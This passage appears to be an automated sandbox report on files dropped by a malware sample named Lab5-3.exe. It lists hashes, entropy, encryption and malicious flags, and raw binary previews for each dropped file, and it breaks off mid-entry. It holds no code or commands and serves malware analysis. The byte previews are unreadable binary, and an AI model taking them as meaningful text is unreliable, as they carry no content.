                                                                                                          SHA-512:C87E903FACE594CA8542DAB1C86603AC681E2BCB479C03691B7F2D91A7751A8E051EBC2972C7C96B3579C76E9EAE813E3EA0D86564720145931E4CB624254E16
                                                                                                          Malicious:false
                                                                                                          Preview:9>. .F...r"._..W.....a......r.fa..`..j...1.....pI.CL..+...>.h:.0...a.,..{..m&....Y..zQo;....z.x.E|.%.......'3.......m.R(,.].$-.._&e}. .......'F...h.qI.\......\..bj...%.)...7....{.....g.$....t..-e..0..5......>.O..da.E..'..M....Q..J...nn.qb.D.*Z...m....'s....w.'..S..q\...7+.8..S...........B.n..Z.............l.K.....!..'...n9Mt........Jn'_..yJ.NY..mu...i.qR\.q...s...w:@y2/..4.Hi...H+.G ..%...kK...:....S4..t8.........P..D..G...K<...J.....,......'.5.:kr.J.yH.o.(D.p.8..&p....u.U..p......?...1....._..,.~%.......[E.sa2Y.0|V...F.."1.B..Q>&e._9(...1n.Q..|..6W#...|.G.\2Z...'...+...h.Cn...R......1.B..D.....8.$3...i.Z)T?Q..D.'.[....(..*.?1.v>...^U4SKy....Bou.....}..D...-l.%rUw..d7...:..h........lne.%...y.cX....X^..=..S...A.C..X..K..3..*Y.}T2!.0.d...z^.....L...........r.n.(0..........7>.G.....3R.........H..<... e..I.X..h..jzh.OG...X.p0.1Aw..f.!i.y.).-..5..].(....S..2XK.'.....Z.sj...l..Hb9EJ)<.g....'.#.`..M.......U.R...f.S...Nq,.....ja]...9..H.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):77920
                                                                                                          Entropy (8bit):7.997603089259593
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:/3RGU3zhZUR8m6rM+7wV29C0NdLyr9IVecjVmtyW85rTyfMDEZ:pGWFZUR8THLCOyxI10tV85r+EwZ
                                                                                                          MD5:4C6C019E4237D2B2E0D9F6C497F1B789
                                                                                                          SHA1:25D9ADFB67FC087F4C4C1649A9EBECE0AF68D24F
                                                                                                          SHA-256:27C2F089A426E284763BCB31849B40196B20B3646B78DE9FFA1721BCFCC67C80
                                                                                                          SHA-512:4185262EC9D01DD257E64BCC7F6A4C97B70A18ED963E392DD5E7A2AD0E7D07958E663AFCFE444826642602DDF1F6CECD3DFDF772D3753DA6FEA90E472394F1A5
                                                                                                          Malicious:true
                                                                                                          Preview:..MU.z.&.gS!@..G....&.....].{....q.%....)4.S.T..|NY.0..'U.Q....b.....e"l...B.Y).Dp./...)...w...@..\.w.f..V.....;.f.L.M..ki....D.}v .&.*>.6.._......bW.ip...7@g.|.../*h.fdr..//.".[%-..B.0.6....0...p.n.......:.....e[.<.+C.Yf5...N.\...1.U4..[.=a-......E...;......c.w....K-.a..Wv..c(.T..Mb..{....._.W..p......@..qR....)%+...v......u?..Ml..V.#.....w.M.\..=..6.f$..U12@...K........?,....M.. ..zT%.`...5...xtC..............}XYg.,C..._K..wh.....g.g*pOX.{Z\Fj1..ST.9..F*.3N;5.@..4\.b........+d..S.C..,....d..p`....7 .....H.2(.k_.TbG....O..f.j_.V.....O.s.I.Q..Vc.....s..}.'.g.R..#k?u s.3.SF...N.xt@p~x.`.^...D...D......4..[...5.. k...m...J..U>.,......E....X.....Yc.cX.Zd..P.@i\..N....T.t..#d.Ny.xIHJ..+....nj#.'..R....u......0._......N...PF.W. .@.=.[.<.).....6.q.=;....90b.m~dA.1..{....X...0g../e.W.;..@j.{TRr.i.1..'.9kM(z.l`...t.....8..|..^.bE...s.haU&..G_w.yqL.....V.@.C.x2.3......@.R.H..F.."...P5....A..2..AY......QMT..R..T...%...z.2.....3.%..{.....pwT.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28352
                                                                                                          Entropy (8bit):7.993703660574096
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:PwkpDDLGZil27QX5eBDtntIGSpSGVIAyZ:P1pOwsBZnKG2nyZ
                                                                                                          MD5:BB50869EF55CF2CF824973018FF11702
                                                                                                          SHA1:DB9775081E118F09DE9523A6C282F93A943FE1F5
                                                                                                          SHA-256:A59DD1DF0B3A3F2A3973BD85BE984ED8BDAE1F382D49992FB85CA33C161B6E16
                                                                                                          SHA-512:2BC438171C54AA16671A8863C56C48611C27B1F8BADB5611119C2D7FFE470987FB047F2770F37FE7CCED01AC4287B65FD270DD44516D87BA8CC65AA160442CA7
                                                                                                          Malicious:true
                                                                                                          Preview:..l.rz"`z`.U.d.mB..\.....i...o.....S.Os)..kdc..A.|..>BQ..m*U}..z[.#..e.n..e+........4.\.. p...o........O.U[.C......4Dgy.b..%.S.(3n.Y..2.q...%...=..]=.X.L.8....=b.r.{.,3u.-..,%..*......q...L.U...[..+.B4.......y.."....iE....\.....[G-=.JY.@F\..e...6..H...r.S...2nv..C3X>?b.w. $........-a..a......o?.....R+p.?.D..u.*A...?!.p.".C...?.. .1I*.|....Z.?4.R5.km...P#>(.*u.Uy]{.cnaTM*u..8....7)l....f......Y..j..mDL\J&.8MQ....6._.W..`..L&)..}....-..8o.5....j..=.RH.M.....)ZE...i.%......n..Q..)...10(Ne...F...=M.=.u.w..$.<.T..g.8Z...%./.LD.]IhZ.e...S"L@..*..G1.9.ka.z$..o.....#$F....-.V.@....d.C.l.IA.>.......][..;..qr....-cs...wk..~...1I..J...4k?,..o......Z..P........Ja.+..T/wM.Ee...,...f.l:....Z...."H.PU....j8!.....t..w{....Jx...T....@8^.Vq&.......wY....XFx...1.d.&.v.Y.G.Tuh.g.=..!...Y........DU.O.....I.i.4..r.z.......v.'g....S\..^.,[..6.....2...........%..~....B!Z..-~....{...*C.._...C.$.....>=...uj..+.. ..T...w.}f..*.(...Z...6.zv.J.KS.Z..........R.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.8958790267931995
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OXNVsSacHfUTid3hBaUoSGFcmeykEdEElU92i:AiSabGx0uKeY2ElUJ
                                                                                                          MD5:EB746A5365B4BCFA52F49A8175D5E8C6
                                                                                                          SHA1:5F9FAA9E52D46507F4650AA307629199B5619F50
                                                                                                          SHA-256:6EE1A1FC978C723FC969CE536F8E90AF17323256F254B985DBF72EAB05490F24
                                                                                                          SHA-512:CB6A2D32D1F9D3CAED1534ABE5FCEE685F3E526973E499888120E9C6F7BA9EC10D65456DA83F25BCD9A7041A44A50483A8EB368B92052AA983EA858A70196BF2
                                                                                                          Malicious:false
                                                                                                          Preview:Bn...h.f]..S.......V_.#u..kuz....\.05..2e .U.q.+.}......b..yNH..7..&...~!....I.G*fJ.L..y...Q.u.Y...Zr..{...e0...xkpj.....%...3...'......K.r.7Z......-.LVX......N.vu.Xhc>..r..m.C...$]....l...7...X..........%]z..Q.....a.r7.}..lO.......N.-5.=5......S.r.}m.........J.....q..y...>.....[.J..{.5..,.g|V.y.....,.m8k%%....I.......XL.(.YV.........\%U....q....U4;.H.X..|..I..{..m.d.....\d.3p..d6L..6.L.o.....y..N|P...B..y.....y.-_H..GNBG..y+YA.v.Q.Qu....&.[.~...\.........F).j$...Y-#...........'.G....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.892362710990379
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oYTlEtYHfUTid3hBaUoSGFcmeykEdEElU92i:ojGx0uKeY2ElUJ
                                                                                                          MD5:DA98A9AA5B0A9E64FA12A9723BC37629
                                                                                                          SHA1:DD478DF2B1CE99966436D35F1FAAD5BC4A639AB0
                                                                                                          SHA-256:D9BB4238410FF92B49507B1834E2ACB6EB87AFA8A33230A2696752626FE722CE
                                                                                                          SHA-512:93EB52951188BFF4ADB7D96537C9F637C473995253C6BF83F0DEB091EBB0E6DFE23093FB45EBF1EA964F1BD4F5E32C3B684641ADE782DD4B1EE0F9E481680A3F
                                                                                                          Malicious:false
                                                                                                          Preview:g.>_..t.y....-]..v{.u..{..`Q.....;..w..,t2..k.*..?,....q.[1.O.R...ce...or.....cG....`.....[.o..s....N.c...5..T.....K...`p.cLui.. .7?....X...G._.W.q.f.. .q8.e|nCi....E.....$H4..h+.Ol`R&.-.V.L.1L.P..VO.f......&.v#..`..X..<.....U...._.0.B.......##...n.[h...y.z...-y...n.)H..S.W..U0.=.......uA.Fw...-L..f.t.Y.$^....D.D-.Ez...X..#.6.D0k@..i.^a./.P@9~{.-...=.....W..H.EkE6.Dqz.....e.k.v...P.....EY.W.6.S..BSr_4t;....d.'.|.o.H..h.,... ..b.6;...}.x.O.l...I..M.O@nV6...9....N..6.........vU.P.~...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13664
                                                                                                          Entropy (8bit):7.985981172448597
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:s1cd8mLmtM0xvwv4n5zJwA+iY0ZZnj2Gez6FeZsyWxk5N+291f+uWOL48E5o0Cb:/LmtMKwvUzJJ+kduzWlk5cw1G4JAotb
                                                                                                          MD5:84DB6E257DC993936200649C72B47787
                                                                                                          SHA1:413FD988FBC255F225866FCEB4A4661E8D956CE6
                                                                                                          SHA-256:C957187D650C1AD90C1A47128C29894B89AF69602D0FF94158AC1C893FD375C6
                                                                                                          SHA-512:A99964CEAC24F93FF8EF06203BEB4C95B22DE87F042AD0E01D839597DDB8E648158AE6A32427D5D3695E7FA42729896EC96DB18492E41771A5CBF43C3986B311
                                                                                                          Malicious:false
                                                                                                          Preview:..I...I7g.6..o...$o.d..#=.....U.jp.....$A.<...`..=.#...=.>........K..j..L.V.}..L....ud...i)^.3.......i.../.B.m#V3.?W`.r'.J..?.....Hqc.p...1X.....O.~.b....S..M58._....$Z= ..~I.e-.aV3.D./%-........^ByqWA....v......./...Xj.c...B1.tI.a.j<..........<...K.2.V.v..>F.....R.....~...5$..`..>...a-."K9~y(U..Qd.....3.:.x....ml[...K. .KWr..!bCQKs.J.Ug.O..S...$#....).a'....sCE...h..1n8.d.........7.q.g5.....9....G....K.A."~#...P]...O.y........s..g..i ...','.....././M.o.TL(..&..R....?3.az..y:.//a...r..p.......`.....d......A>.....g..D..m.W......U.. ..........].......w....&.x.....,eY.....G}....u.l..Y..DT.1...Y.,U.W.h2....*../P....3..`O...+.].c....2ix.?...2G.Z.W.YxPt3C.dC.7..)|V.^?7S..txq....(.?...{.8.w....h....&.....w....x#....s..n.......r..o..*.F.....!+......-..{.......j.....7.M.AYvY..Gl5l...M|.K...(....h.....+.t..br.;s..Y..N}..A@6B.y../ .....B,I:..t.....u..j.F.>............2..R......=.....w...gc./..........s.GLSD.b.?M.e.s....>\.oL.t'y...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21440
                                                                                                          Entropy (8bit):7.992363428098337
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:lwfRLodN6yareU4riYnIfSIeE8zeDgxv5iw7zxJtZJ+Jbb/yMtb:2NONRareBIfSIeLz4gxxx7zXtv+JfTZ
                                                                                                          MD5:087CC288763447E599370C47CCED5F5A
                                                                                                          SHA1:B78D6DF688D34364667EE966E6A85D95F68D7F5D
                                                                                                          SHA-256:8069D505605BAD8A9D061D97C17745CEF4E08047DEBD33BC5BDAF9BE2076A945
                                                                                                          SHA-512:AF09CE571EC9791459FA14A2DFDA2209E7B8BA2F087C572E6C8FF22F0C79512187B17DD778586E8949E66707E2BE3A0280206959F640CDFBF41499426CA86C97
                                                                                                          Malicious:true
                                                                                                          Preview:......CA.........20&.-..r..x......*..T.G.......D....6...o.l.........&m........D.)p..]~hb..P.5...T....:E.@D.f.B.QV.gi...Z.~...&.4cK.{r...K'.O.........X.y..e .n.. k.......{.....p....k.%...z....C"..I/kD...h).ACYq&.(G......y...n..m`]f.{..h.m.....I.../.l.Um..:.._...LM...z.[R.....@...K..!ubh..QcP.+.F....H........ ....d...[r....Wb@lb.......y.^..D......}&./%..-..&.tx...:..<.u.+Hs(...L...t.,./wk.A-)....'R.J%[6..I.........T...v....^rs.]xg.u.*...g...;fnQ..|5..5.....h.e....O......<.sLI..?<.....=Pr.X>..{.kvQp.b..".s....=L'!X..T.r.|.jg.P......U..~r....x.[.....M[..b....$_S.B..:.;.;...v.(......!....NJ!bG.L/.k....#a.8Y.n... .r..!.A.P8q.....t-<.n..D..WRjd.!Bq.*...} .Y:..L.g...C.&.[...4......8.....,.<.../..v..u.D....N{h....ra...b.I.p^....!..IF.V?.....q?.irk.5.'y.....k2.]...MR....*....QO..l.u.>.' ).....>.&>2D?!.b.c. .v'$Z.<;.51>.#.V.-..<...M..u%[.J4../.~~A..?..=....6....H.......}v...g../}....f....T.Fh.l......T....2.7.&.:..7O_s...V.~h,..S3...3m...}ir....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.900423233454033
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5Gb5tYrTfdmHfUTid3hBaUoSGFcmeykEdEElU92i:5MkTDGx0uKeY2ElUJ
                                                                                                          MD5:89EC538FEB195871B9FCC5484F584EF7
                                                                                                          SHA1:A4C42DD9794CA019F41E221552AF6C0F6FDC38FA
                                                                                                          SHA-256:F8E28A7FA515CF2623D3443133C36980A1998958192103F590AA5168BCD36398
                                                                                                          SHA-512:5CAABB163968F4121E0E2F489CCDC8D910A50173D2B71FF775B8D5611DF73EFFEF98EBE4CC3934053AF7DB58EA6B04C1A05EEF628A011E3C5317CFF95BD1CB1E
                                                                                                          Malicious:false
                                                                                                          Preview:...e.a.xY...".A0.{.Z]..`.Qu..n(...4{..K../...Xx"......4E...d.Le..2..E(....ED.`v..&.v>..J.i..4Q.[E).....C{..._..{+.|.D.....f.~..d~.v.p..m` X..7..qtyPX.LJ9...5..Q2...|.-@.e{..5.......`.!....0..K......mg0{F...v.K...>.....Y.0C.lW7.7Y0......f..d...6..~....jX./.......).;4. H.|lEvF.2.;.....W......-...vQ.8.D.[..X...@....w.k..f.+........4].h..]I..e.1m..W....\~..L..v..g...m.F.......].<kPx.Q.`..R>.B{..^...l.z....%..p..Q',u......m....O#".\......F.6].L.O.......v&2...q3.n.3. c.?.}P.R..e.G.E.{r.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.906755794165246
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Kl7ZgSdxD9MAlJUHfUTid3hBaUoSGFcmeykEdEElU92i:WxdgAlJTGx0uKeY2ElUJ
                                                                                                          MD5:84B217286CFF1116BC16E2C1A200B6B7
                                                                                                          SHA1:922C0A97AE047BE24666875B94AFA867164CE7E9
                                                                                                          SHA-256:C1C056ADD98F3E18D1E14C410CBAEEBAAF74D9D283BF5B1CD114AE37148EA27D
                                                                                                          SHA-512:0EE5EA3344D17BCDEE8D556C2612C0D8AF2A61B35286DE20C1DD2C1FA865A3B43853FF2DA195D9912C4A2C84665968254C3620C09F080E95430DD7B45926C2DD
                                                                                                          Malicious:false
                                                                                                          Preview:..R....e..A...]...GZt3...>*...@..($.?]wgT.B).1.H..F.Z.......n..../W.@].P...2.M.>......i.}.....u...Lfr~x...0......XS.+z.V...pH.h5d..9JV82L,..$N.-.o'R..o0c5..j.m...L.......p..B%w.....>9O...X./...t...E>.R.B....g.k...('.........2.n..^.FsFTr.t.../L..z..s.8\..).@.p4h.lL.<...WCt-./....~..v.yD..D.M. .[.e...K.#.Cl5j.:.xc......@.........Z.....;I}.yU^.n.a....E....)..M..q....E.h.|36....e.s...i.....i...9AG....2..ex.:.L2.....Q..W.E..&.Jk3.#+@x.#kf..b...&.).HB....$.r..u.?..e...&E.y.@......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.913924414736249
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:B3ZB6bJ2Zm49SVrFLoxiHfUTid3hBaUoSGFcmeykEdEElU92i:BpBMsDMVruxdGx0uKeY2ElUJ
                                                                                                          MD5:2480C483A687EDE5FBCB6CEB82940D7F
                                                                                                          SHA1:44EB0D9C8779FE5F5D7603255F4655A3A99A8CAC
                                                                                                          SHA-256:62B4C505CB05D5F8197FFE59E51EA5C034E2AC128FA124D1E8E436619FCC0F92
                                                                                                          SHA-512:CC09C475229EF936C7F82AC2B39E6ACF752CBB29CDDC23B111B60DAAAF6FBD9187C27890FA01AA622BF0D291781126E2AFEDF7D7177FD4A43A22EBE2EAFA743A
                                                                                                          Malicious:false
                                                                                                          Preview:.j.*.0KJ.Dp.a....o..n...Z.....rR9.Z...>).n.....b.......Q..6..dN....J&X..........<C.......V1....Y....1.?#..CA.Nr.w.x.3~.V....j.f$... .1z...Ks7.......b.b.......|Z...Zs.~.1..W.....g....a..)s....ae.Yy.......m.z.=.]..,.....Z.Q..C...5...i..]l.B.IxS..D6..."=..a#.W7.j5.=b.......D*%.FeF4M.Z..eQu`@h@..Z;...g........2..L....<.D^.jA..F.c...n......:."/..sw...*.^......LV.....K..`...\.....l...W.}|....RN.m....M-./6..5{.,.vST...ES._.P..fj....+...Kc...v?....([q.!...2N.........dY..`UZ.AA;.i.W.....$...0.....P%..X...Q.S..Q...l.B.T...........4by..v).,l+..dkK.o5.<...../..s%.;..^.l..UF..;.....`....mt..&.r .......oB@...[.....P.O..d|...Lu...Y.<..{.Y.X.W.M..S....c...g.?....j..oH.>_.Z...F..@w......$......#....ZK.......Y.fy.TW$$p:Hu..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8048
                                                                                                          Entropy (8bit):7.976984329300815
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:fdczV5LzPyL768HGD7CUBNKUNGndtuPhP0Cb:M3fPS7mLNJGnQPtb
                                                                                                          MD5:4DB17A33C30A8B645960B75BBBD11113
                                                                                                          SHA1:2A51711C59B76BBC7B341D449A74B0E82173E382
                                                                                                          SHA-256:7D89C84291B468651384180AF3D6492B6BF2282FE19CC4490992B7A67FF6D99A
                                                                                                          SHA-512:E0B66C5795632969165BFBCE7EF18443EE85B71B27F6ECBFCA88967E9A04710C14798689D82C079C650685D99C9F452C4EAB0C6E232C2DBB56C742BC5EC192A9
                                                                                                          Malicious:false
                                                                                                          Preview:.J.8......u.O...C. ..?....-n:..0..Z.~#......0].V......../.........D..........e..F...|.2#r.Y....Ww...Kh..n......\...E...J....^7.a...C.aS..P..0.Fcr.......(........;..M..k...F...H4:.{.7!|.x..^'..x.a....G.............S<..........'....j.P,?..e./......T...i..U.R-.._.....G6.......E.U....}e..&.%.>1.\.nU.y....ti.m.T...FQ"........:.w....C....\M....Z...{.n.tV.0.'...~..C.#XH>._../q......P>.-...:2.>.c...}3Cu..8Z....]...o.<..u.........>?..J.v`HB........\p..c>....3.Zl.s^....w."....p.{..Y%1#X...1......r.l(.z...7ozh..k....F...0m>.....#?3..r.a ........EP...QP.>S..<...UOrb..Z..;O... .#6&.....aa.V.oOK*.2G_.3......(....m..'.`..t.F...,q'.*..?Y...;..~.!..1....3.q..I....!zU........r.#Xi..eL...[./.B.Jk.i...^.vN.$.n./.....LU.........^.6......sh[...Y.p..fOB..)@.S..p.'......h.PT/D.&.".:..).0{PE..y.......\.L.....^........4c......w.{QG....'IV].s......U!...1f..l...B....}.'U2.i.,..j..=.x...K....Q..FS..L......I69..xb.......3(#P...#.15..4...c.8.}..h#.0T..u.@!..-....E....c.j...DS.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31696
                                                                                                          Entropy (8bit):7.994172281238188
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:hx6DngbwGnnXRdpx0Jv1Dq0HuDEuZ6+67Z:hRwOnXRd0TDLOwl+QZ
                                                                                                          MD5:AA3DC4E7D5616626D89E0C09FC6CE1F7
                                                                                                          SHA1:8770DE527D11F817EA6D73ABE044EDD12A8B8401
                                                                                                          SHA-256:634307DD0B2F90EDB30E93F3A7E3E98CB561CEF655FC51AAE1854F8A55958A65
                                                                                                          SHA-512:2252CC6DB518773B97BB116EA3AE18D980263CD2238E9B79B80FC32E9AE66485496AFAF3659C60FD5168339A279A70F23ADB6C62574ECB1DF39FC6F926FA7F78
                                                                                                          Malicious:true
                                                                                                          Preview:.%..@W..>v.[...@(...../..4...*R...bK"....}.....uz.3.M.i.5g....].1...]d.W...A....v.].....j^...C.L..0....J.....$.v..O.....0...SH....P&.&Y..0.....`.... i.Y.....rP5.q._o...:.P&....<Py^@v.w..>.m...{..Y.........~D..5.. H|R.O....].~t~.n.-.u.{./h,...Q.tF....m...(..u]..k.|.F&.Y.@..Jk.8.*....f...Q#...[Y,.._..e....{,+..-...r.....OB.,.. To.......5....9X+......k....}....o..R.zN..k#.....h..RvTQ..^B.6...@.8..|.I....9x..sM\...G...$t........B.....@.".s...}8:mR....)..r..8qp.#...k..Q..m...5.{..r.....L....<.).W.n......-.}`..m...w..n.H...._..T.b/...h.T'...HY......+..+......a7Y<..(.......`t5.Mh).t.....Fw..(..f...z.Rk...P.\.Z..2{.... _.......DfJ.B.T..^..aX.O..M.7.xD..5.+...../..$..{.c.K&...k.W.OD..U.uroe..X!.no..=....p.V....Uq.W*Z..........(q.#...`....p.7..W..|h..~...%Z.}.N.NQ...7w.Z..N.....}.X...D..._,..?GM.."....nda.....I..4.".b.QK-..F.v.....].&..'..;.'.5..*.....*.R..).q_-v....0...#...*.RZ...H.:.yx.....c...T.......HX}......V.=.....{...u..D..R....K.n.q...s..<..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.906630087331835
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0SW2s0z/u6tgHfUTid3hBaUoSGFcmeykEdEElU92i:0So0Lu6tnGx0uKeY2ElUJ
                                                                                                          MD5:C1A7053A600240057A4F4B3192539C83
                                                                                                          SHA1:84E05E738B1FEE0A5A7CA49C344D00E16C7C1034
                                                                                                          SHA-256:B94454863700E534157B8234AC9B2F239B94CD44789CAE43A33E5E44C92E847A
                                                                                                          SHA-512:B3B749B38F1A10BF4F2CD0AF514812CD3A130B4289E15EEE3DBA9A74AD54FAF281E7072A841133FAA25D3C56C760A844FD4E4380C9F94D326CB5488B13BDF689
                                                                                                          Malicious:false
                                                                                                          Preview:..q..%y........Q.5_..lz.....6^.2....B..M.../....?MG...0.......{b..w...F..g...X...<.....K..^ud.....a.^.#..S..1.C.....z../..D^I.._.uY..b......B.4....vw..5.Gvj.......M.L."s.8..FI?.F|.....rW.7x.9t>.K..=...0.G......Z.....P..Jf.....f.....d.....w..}./......c..b..........|..W.....$..??....Md...!<.f....w..``.U...6.bi..-.....7s>b6......Kj3O...$........._.D.c.q6S)UX?3..K...}2Y....%(0._.%..#.N*.U..1ccZi......6..ohS....K.......u..o.7RW...]....\....(... P.n.+..b....h..Fl2p|.T.+.H0.G...r.$^.,.>......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.904458489216598
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qWt8wvr0Rk7YmBHfUTid3hBaUoSGFcmeykEdEElU92i:qW9vr2hXGx0uKeY2ElUJ
                                                                                                          MD5:886F02AEDD834907FBFF3D9D964E20A8
                                                                                                          SHA1:26892D14FE0D1F3C7DEFA0FBCC01C2228854B39A
                                                                                                          SHA-256:7581C333FA1A8BDDCEAB8D4F82BAA05636E7238A98CE57D50336A11BA72AFA8B
                                                                                                          SHA-512:3022255C6E730C448642259AF06346913CD6F42AFCD78EF0224A783AC845F871E7BDC202AB9A60101CF4597DAB85C302D5E70BEE997F05F679A4277B480E94A8
                                                                                                          Malicious:false
                                                                                                          Preview:......B..#f].s5...G<.6r&p.{.Q. .* W...!...nS.t.d...2....0..9..K...*i.5.g+.....~+V....v....x.o.{c..Zh...+3....h..b..~h......2.....`.....`..6..T`%........."..$........_...4.q8H...*+.r......P..r.m....^[.8..TK.`7V-.. ...)..K.}.=...:.......^S...8F.~.E.K*Q.....7V.V.[H......`....(......:..|.....&}H...Rh.I(.e.R[.^/..T?E4i...1..].4.J/)...>......n.e.."w".T..O.M..[g1.......Z,..*JcG/..g..\G.8..)...X.A.y}L....1.e...-..T......u,K....{w_.Z.8.]V..].Q....|..`+........]y.....v.T.+.]f.b...V.m...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.896706827723553
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kxjIp8TDkHfUTid3hBaUoSGFcmeykEdEElU92i:4+SjGx0uKeY2ElUJ
                                                                                                          MD5:B6FC05A154279C24C51F02C9C1D5EC43
                                                                                                          SHA1:3C7A4D176CC7F2C849E233FEF3A0182BF8889551
                                                                                                          SHA-256:4C8A297B6F2939747477EC2CEACE37FC88E3F24DFC2AB80D4313BE56AE554DFE
